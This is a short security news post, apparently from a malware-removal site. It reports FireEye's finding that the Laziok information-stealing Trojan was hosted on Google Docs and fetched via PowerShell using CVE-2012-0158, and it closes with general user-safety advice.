Cybercriminals have found a way to compromise PowerShell and Google Docs in order to distribute a Trojan known as Laziok.
This was reported by FireEye recently. Laziok is known as a Trojan Horse type of a virus that is used as a tool to steal information and compromise users’ system security. The Laziok was first detected last year during a sophisticated malware attack campaign targeting energy companies in the Middle East. What attackers take advantage of is an old Windows breach known as CVE-2012-0158. It allows them to insert the Laziok Trojan into users’ systems.
According to the FireEye researchers, the hackers managed to trick Google’s security checks and inserted the malicious code into Google Docs. The Laziok Trojan was uploaded a month ago but was promptly removed as soon as Google was notified about the threat.
Researchers say, that usually, users are protected from malicious content in Google Docs because it actively scans and blocks any suspicious or malicious script. The Laziok break, however, shows that this malware found a way to trick the security checks and managed to upload itself unnoticed. After the threat notification, Google immediately took actions and removed the malicious file.
The same Laziok malicious script hit PowerShell, which has increasingly been targeted by cybercriminals, to download the malicious file from Google Docs and launch it.
FireEye researchers explain, that PowerShell can be abused by cybercriminals as a way to bypass anti-virus software because it allows the insertion of payloads directly in memory. It looks like this technique is commonly used by hackers when it comes to malware attacks aiming to steal information and break through the Google security checks. If Laziok Trojan infects a device, what it does is, it collects various information about the victim’s system and sends it back to the attackers, thus transmitting private data and banking information and abusing users’ security.
Luckily, due to the prompt threat detection and notification, this time, millions of users worldwide were saved from getting infected with Laziok Trojan and having their privacy abused. But we know that this is not going to be the last attempt of the hackers. As users, our main protection against such attempts is to pay attention to suspicious content and stay informed on the newest threats and software updates. Our “How to remove” team is dedicated to notifying users on the digital world threats, tips, and tricks to ensure a safer online experience for everyone. Follow us on our social channels and never miss the news!